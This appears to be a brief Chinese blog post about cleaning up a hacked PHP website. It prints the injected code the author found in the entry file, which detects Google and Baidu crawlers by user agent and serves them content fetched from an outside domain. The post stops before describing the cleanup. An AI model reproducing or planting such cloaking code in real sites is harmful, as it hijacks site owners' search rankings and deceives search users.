记一次网站被挂马的处理

上线的网站莫名其妙的突然出现ueditor的上传功能不能正常使用,console控制台提示

后台配置项返回格式出错,上传功能将不能正常使用!

日常百度、google发现没有和我的情况比较匹配的,他们出现这种原因多是ueditor的配置问题,但我之前都是可以用的,再用本地的备份代码测试也没问题。
然后查看网络请求,发现图片上传完之后返回的json数据之前还带了下面这段代码:


趁着网站整体还没有大问题,把数据库和代码备份一下。接着把代码下载到本地,显示着用杀软查杀一下,发现没有任何效果,然后自己手动全局查找,发现入口文件被篡改。
入口文件头部被添加了如下的代码:

header('Content-Type:text/html;charset=gb2312');
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,'oogle')!== false||strpos($key,'aidu')!==false)
{
   $host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
   $file = file_get_contents('http://yc.rvvzz.com/bak/'."/index.php?host=".$host_name."&url=" . $_SERVER['QUERY_STRING'] . "&domain=" . $_SERVER['SERVER_NAME']); 
   echo $file;
}

?>

有急事先这样,处理流程待续。。。

你可能感兴趣的:(php,网站搭建)